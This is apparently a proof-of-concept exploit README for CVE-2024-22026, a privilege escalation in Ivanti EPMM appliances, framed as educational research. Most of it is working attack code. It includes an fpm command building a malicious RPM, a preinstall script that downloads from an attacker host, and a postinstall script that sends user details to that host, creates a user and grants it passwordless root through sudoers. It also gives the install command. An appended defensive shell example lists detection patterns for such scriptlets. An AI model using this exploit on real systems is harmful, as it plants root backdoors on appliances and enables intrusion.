Exploit POC for CVE-2024-22026 affecting Ivanti EPMM "MobileIron Core"
CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.
Read the full blog post for detailed technical information: Exploiting CVE-2024-22026: Rooting Ivanti EPMM (MobileIron Core)
- CVE ID: CVE-2024-22026
- Severity: Undetermined
- Attack Vector: Local
- Impact: Allows local attacker to gain root access
- Affected Versions: Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1
- Patch Availability: Patched in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1
During our research, we discovered that the appliance uses the following command to fetch and install RPM packages as a low privilege user:

```
install rpm url <remote url>
```

The command above is only a CLI wrapper; behind it, the appliance runs the following as root:

```
/bin/rpm -Uvh *.rpm
```

This underlying rpm command enforces neither signature verification nor URL filtering, so any RPM package can be installed. An attacker can therefore forge and deliver a malicious RPM package that compromises the appliance.
The following command is used to create a malicious RPM package:

```
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .
```

preinstall.sh:

```sh
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0
```

postinstall.sh:

```sh
#!/bin/sh
set -e # Enable strict error checking
# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
echo "Failed to add user 'exploit-poc'" >&2
exit 1
fi
echo "exploit-poc:<redacted_password>" | chpasswd
# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
echo "Failed to modify sudoers file" >&2
exit 1
fi
exit 0
```
To exploit the vulnerability, the attacker would run the following command in the CLI to fetch and install the malicious RPM:

```
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm
```
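For contrast, the checks a hardened `install rpm url` wrapper would run before handing anything to `rpm -Uvh`, written as an added example and not code from this repository or from Ivanti. The allowed origin is a placeholder, the `rpm -K` output format assumed is rpm 4's, and the scriptlet dump used as sample input is constructed to mirror the PoC's postinstall.sh.

```shell
#!/bin/sh
# Added example, not code from the PoC repository: the gates a hardened
# "install rpm url" wrapper should apply before anything reaches `rpm -Uvh`.
# ALLOWED_ORIGIN is a hypothetical placeholder, not an Ivanti value.
ALLOWED_ORIGIN="https://updates.example.invalid/"

# 1. URL filtering: accept only URLs directly under the allowed HTTPS origin.
check_update_url() {
  case "$1" in
    "${ALLOWED_ORIGIN}"*) return 0 ;;
    *) return 1 ;;
  esac
}

# 2. Signature enforcement. rpm 4's `rpm -K` prints "digests signatures OK"
#    for a package signed with an imported key but only "digests OK" for an
#    unsigned one (and still exits 0), so the text must be inspected.
verify_signature() {
  rpm -K "$1" 2>/dev/null | grep -q 'signatures OK'
}

# 3. Scriptlet inspection: scan the output of `rpm -qp --scripts pkg.rpm`
#    (saved in the file named by $1) for actions no appliance update needs.
#    Reports the lines and returns 1 if any are found.
scan_scriptlets() {
  hits=$(grep -nE 'useradd|chpasswd|/etc/sudoers|curl |wget ' "$1" || true)
  if [ -n "$hits" ]; then
    printf 'suspicious scriptlet lines:\n%s\n' "$hits" >&2
    return 1
  fi
  return 0
}

# Constructed scriptlet dump in the shape rpm prints, modelled on the PoC's
# postinstall.sh (203.0.113.5 is a documentation address used as placeholder).
sample_scriptlets() {
  cat <<'EOF'
postinstall scriptlet (using /bin/sh):
curl http://203.0.113.5/poc?user=$CURRENT_USER
useradd -s /bin/sh -m exploit-poc
echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
EOF
}

# Full gate: all three checks must pass before the package may be installed.
gate_package() {  # $1 = update URL, $2 = downloaded .rpm file
  check_update_url "$1" && verify_signature "$2" || return 1
  dump=$(mktemp) && rpm -qp --scripts "$2" > "$dump" 2>/dev/null || return 1
  scan_scriptlets "$dump"; rc=$?; rm -f "$dump"; return $rc
}
```

Run against the PoC package, `scan_scriptlets` alone would already refuse it on the `useradd` and `/etc/sudoers` lines, independently of whether the package carries a signature.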
Ivanti has released patches to address CVE-2024-22026 in the following versions:
- 12.1.0.0
- 12.0.0.0
- 11.12.0.1
This repository and its content are intended for educational and research purposes only. Use of the information contained herein is at your own risk.